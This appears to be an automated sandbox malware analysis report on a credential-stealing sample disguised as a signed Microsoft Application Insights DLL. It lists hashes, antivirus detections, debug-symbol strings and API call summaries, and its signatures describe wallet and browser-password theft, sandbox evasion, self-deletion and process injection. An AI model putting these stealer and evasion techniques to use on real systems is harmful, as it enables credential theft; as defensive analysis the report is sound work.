Windows Analysis Report Microsoft.ApplicationInsights.PersistenceChannel.dll

Overview

General Information

Sample Name: Microsoft.ApplicationInsights.PersistenceChannel.dll (renamed file extension from dll to exe)
Analysis ID: 482276
MD5: 14e351015c5d632f888dbcac03871fae
SHA1: b5471c5eea356ce87ac5c2df8bbd9bc72cf84da9
SHA256: 977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa
Tags: exe, OuterJoinSrl, signed

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 47
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Self deletion via cmd delete
.NET source code contains very large array initializations
Contains functionality to detect sleep reduction / modifications
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Virustotal: Detection: 40%
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe ReversingLabs: Detection: 28%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.25.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.23.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.11.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.10.unpack Avira: Label: TR/Patched.Ren.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_004062D0 CryptUnprotectData,LocalAlloc,LocalFree, 2_2_004062D0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00406230 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 2_2_00406230
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00405F50 CryptUnprotectData, 2_2_00405F50
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00406560 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 2_2_00406560
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00403BE0 memset,CryptStringToBinaryA,CryptStringToBinaryA, 2_2_00403BE0

Compliance:

Uses 32bit PE files
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
PE / OLE file has a valid certificate
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: certificate valid
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: KC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.699534963.00000000050EA000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdba source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source: Binary string: moryProtection.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: isualBasic.pdbW source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: ml.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: .ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ility.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbeChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: System.pdb"" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb8 source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbt/ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: System.Runtime.Remoting.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: w.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbm source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbdr source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbCO source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: InC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbT3}l source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.pdbH source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbf9z source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: System.Configuration.pdbD source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000B.00000003.699953933.00000000031B2000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: Accessibility.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: System.Runtime.Remoting.pdblrP source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: msvcr120_clr0400.i386.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbpdbnel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb{{ source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: Windows.Storage.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: comctl32v582.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Accessibility.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp
Source: Binary string: rawing.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb\ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: RunPE_MemoryProtection.pdbFyg source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: ore.pdb, source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: uilds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbR source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdboq source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: RunPE_MemoryProtection.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ore.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbd source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: rawing.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.699980162.00000000031B8000.00000004.00000001.sdmp
Source: Binary string: Amsi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbrt- source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: untime.Remoting.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00401000 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_00401000
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00408820 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 2_2_00408820
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00407560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00407560
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_004011F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_004011F0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00408650 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00408650
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00408410 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00408410
